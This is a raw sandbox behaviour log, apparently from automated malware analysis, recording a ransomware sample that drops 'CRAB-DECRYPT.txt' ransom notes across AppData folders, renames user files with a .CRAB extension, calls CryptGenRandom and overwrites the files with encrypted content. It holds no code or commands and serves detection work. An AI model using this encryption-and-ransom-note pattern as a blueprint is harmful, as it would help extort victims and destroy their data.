File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 1048576, size_out = 10895 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 10896 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 1048576, size_out = 637 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 640 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 1048576, size_out = 425 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 432 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 1048576, size_out = 216 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 224 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 1048576, size_out = 18761 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 18768 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3.CRAB, size = 1048576, size_out = 86107 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3.CRAB, size = 86112 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Dggyafw7MArNa.mp3.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi.CRAB, size = 1048576, size_out = 49282 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi.CRAB, size = 49296 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ES FtTu75TP_viPEIbW.avi.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi.CRAB, size = 1048576, size_out = 82491 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi.CRAB, size = 82496 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\f8jDR2JrBEP0JYZ8S.avi.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png.CRAB, size = 1048576, size_out = 75652 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png.CRAB, size = 75664 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\IgMN c6KE0BQMjB3AV4T.png.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif.CRAB, size = 1048576, size_out = 57553 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif.CRAB, size = 57568 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\JHDvV4GFpCMyf.gif.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv.CRAB, size = 1048576, size_out = 72191 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv.CRAB, size = 72192 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\K nPGgQvdN.flv.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi.CRAB, size = 1048576, size_out = 59608 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi.CRAB, size = 59616 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\khYklCMkh.avi.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv.CRAB, size = 1048576, size_out = 66789 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv.CRAB, size = 66800 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\LVJC0a8xXrA.flv.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\DQQHJZ8C\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
